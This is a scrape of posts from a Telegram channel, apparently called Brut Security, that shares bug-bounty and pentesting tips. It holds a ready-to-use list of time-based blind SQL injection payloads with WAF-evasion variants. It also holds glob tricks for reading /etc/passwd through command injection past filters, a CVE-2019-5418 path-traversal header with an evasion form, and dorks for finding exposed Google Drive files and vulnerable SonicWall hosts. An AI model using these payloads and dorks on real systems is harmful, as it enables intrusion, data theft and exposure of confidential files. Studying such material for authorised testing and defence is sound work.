Brut Security

⚠️A neat trick for bypassing WAF/filters while testing for OS command injection vulnerabilities.

Use shell globbing / wildcard expansion. Here is an example


cat /e*c/p*s*d

is equivalent to cat /etc/passwd. But how?

Before cat runs, the shell expands the glob pattern /e*c/p*s*d to match actual files and directories in the filesystem.


/e*c:

The shell interprets this as "any path starting with /e, followed by zero or more characters (*), ending with c."


/p*s*d:

This matches a path or file name starting with p, followed by zero or more characters (*), then s, then zero or more characters (*), then d

✅Credit- Devansh Batham

Please open Telegram to view this post

VIEW IN TELEGRAM

👍19🫡7

4.44K views16:27

Brut Security

Google Dorking for Pentesters.pdf

1.2 MB

❤19🔥7🤝1

4.33K views20:25

Brut Security

API Bug Bounty.pdf

4.1 MB

API Bug Bounty

❤32🔥10🫡6👍2

4.37K viewsedited 04:28

Brut Security

Reactions Please 🫠

🔥43👍8🐳6❤5🗿2🤝1

3.16K views07:18

Brut Security

CVE-2025-23006: Deserialization of Untrusted Data in SonicWall SMA1000, 9.8 rating 🔥

A pre-authentication deserialization of untrusted data vulnerability was detected in SMA1000 components, which could allow an attacker to execute OS commands.

Search at Netlas.io:
👉 Link: https://nt.ls/FLFJT
👉 Dork: http.headers.server:"SMA"

Vendor's advisory: https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2025-0002

🔥5❤3👍3

3.43K views09:03

Brut Security

☄️New IDOR POC- https://t.iss.one/brutsecurity_poc/13

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥6

3.12K views10:25

Brut Security

🔖always examine the .js files in the source code, for this I can recommend this simple but effective tool github.com/w9w/JSA from here you can access the endpoints of critical data, the places where backup files are stored and many endpoints.

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥12👍8❤5

3.38K views11:16

Brut Security

🔖Submaker - Subdomain Wordlist Generator

⬇️

https://github.com/llMNMll/Submaker

Please open Telegram to view this post

VIEW IN TELEGRAM

❤8👍3

3.29K views12:43

Brut Security

⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found.

Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{

🛍If the server is deemed to be vulnerable, but a WAF is present:


../../../../../../e*c/p*s*d{{

✔️Credit- nav1n0x

Please open Telegram to view this post

VIEW IN TELEGRAM

1❤43👍15🔥8🫡4🗿2

3.4K views13:15

Brut Security

⚠️If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: Accept: ../../../../../../../../../../etc/passwd{{…

Drop Reactions

⚡️

Please open Telegram to view this post

VIEW IN TELEGRAM

❤17👍4🫡4

2.99K views13:31

Brut Security

⚡️

Standoff BB Platform-

https://dopescope.standoff365.com/

Please open Telegram to view this post

VIEW IN TELEGRAM

Standoff365

BugBounty

Bug Bounty platform with generous rewards from the leading Russian companies Help companies find their flaws and get generous payouts. Max bounty: $660,000. Exclusive new scope. 100+ public programs. Fast payouts. Strong triage team

🔥4🗿3

2.97K viewsedited 16:55

Brut Security

timebased payloads for different dbms:

XOR(if(now()=sysdate(),sleep(7),0))XOR%23
'or sleep(7)--#
'or sleep(7)#
'or sleep(7)='#
'or sleep(7)='--
'/*F*/or/*F*/sleep(7)='
'or sleep(7)--%23
'or sleep(7)%23
'or sleep(7);%00
or sleep(7)--+-
or sleep(7)#
'/*f*/or/*f*/sleep/*f*/(7)--#
'/*f*/or/*f*/sleep/*f*/(7)#
or sleep(7)%23
'/*f*/or/*f*/sleep/*f*/(7)--%23
'/*f*/or/*f*/sleep/*f*/(7)%23
'/*f*/or/*f*/sleep/*f*/(7);%00
or/*f*/sleep/*f*/(7)--+-
or/*f*/sleep/*f*/(7)#
'XOR(if(now()=sysdate(),sleep(7),0))XOR'
'OR(if(now()=sysdate(),sleep(7),0))--#
'OR(if(now()=sysdate(),sleep(7),0))#
or/*f*/sleep/*f*/(7)%23
'OR(if(now()=sysdate(),sleep(7),0))--%23
'OR(if(now()=sysdate(),sleep(7),0))%23
'OR(if(now()=sysdate(),sleep(7),0));%00
OR(if(now()=sysdate(),sleep(7),0))--+-
OR(if(now()=sysdate(),sleep(7),0))#
OR(if(now()=sysdate(),sleep(7),0))%23
'WAITFORDELAY'0:0:7';%00
'WAITFORDELAY'0:0:7'#
'WAITFORDELAY'0:0:7'%23
'WAITFORDELAY'0:0:7';%00
WAITFORDELAY'0:0:7'#
WAITFORDELAY'0:0:7'%23
WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'--+-
'WAITFORDELAY'0:0:7'='
\/*F*/or/*f*/sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7)#
'/*f*/OR/*f*/pg_sleep(7)%23
'/*f*/OR/*f*/pg_sleep(7);%00
/*f*/OR/*f*/pg_sleep(70)--+-
/*f*/OR/*f*/pg_sleep(70)#
/*f*/OR/*f*/pg_sleep(70)%23
'/*f*/OR/*f*/pg_sleep(7)=';%00
\)/*F*/or/*f*/sleep(7)%23
\)/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/sleep(7)%23
%E2%84%A2%27/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/pg_sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)%23
%E2%84%A2%22/*F*/or/*f*/sleep(7)--+-
%E2%84%A2\)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2%27)/*F*/or/*f*/sleep(7)--+-
%E2%84%A2'/*F*/or/*f*/sleep(7)='
%E2%84%A2')/*F*/or/*f*/sleep(7)='

❤28👍13

3.27K views18:30

Brut Security

0:06

This media is not supported in your browser

VIEW IN TELEGRAM

For Real Bruh 😭

😭

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥15🐳2🤨2🗿2😁1

3.02K viewsedited 19:11

Brut Security

🌟One-Liner - Extract all URLs from the Source Code

curl "testphp.vulnweb.com" | grep -oP '(https*://|www\.)[^ ]*'

🔔

@0x0SojalSec

Please open Telegram to view this post

VIEW IN TELEGRAM

🔥24❤3👍3👨‍💻3🫡3

3.51K views19:28

Brut Security

⚠️Google Drive Dorks

site:https://drive.google.com inurl:folder 
site:https://drive.google.com inurl:open 
site:https://docs.google.com inurl:d 
site:https://drive.google.com "confidential" 
site:https://docs.google.com inurl:d filetype:docx

Please open Telegram to view this post

VIEW IN TELEGRAM

👍9🔥7❤2

3.27K views10:39

Brut Security

⚠️Google Drive Dorks site:https://drive.google.com inurl:folder site:https://drive.google.com inurl:open site:https://docs.google.com inurl:d site:https://drive.google.com "confidential" site:https://docs.google.com inurl:d filetype:docx

https://hackerone.com/reports/2926447

HackerOne

U.S. Dept Of Defense disclosed on HackerOne: Public google drive...

**Description:**
I found google drive link `https://drive.google.com/drive/folders/ █████████` at `https:// ████████.aspx?Mode=ReadOnly&Id=90dd0d3b-0ed1-e76b-128f-11ebc799ba55` contains pdfs at...

👍4❤1🫡1

3.24K views10:41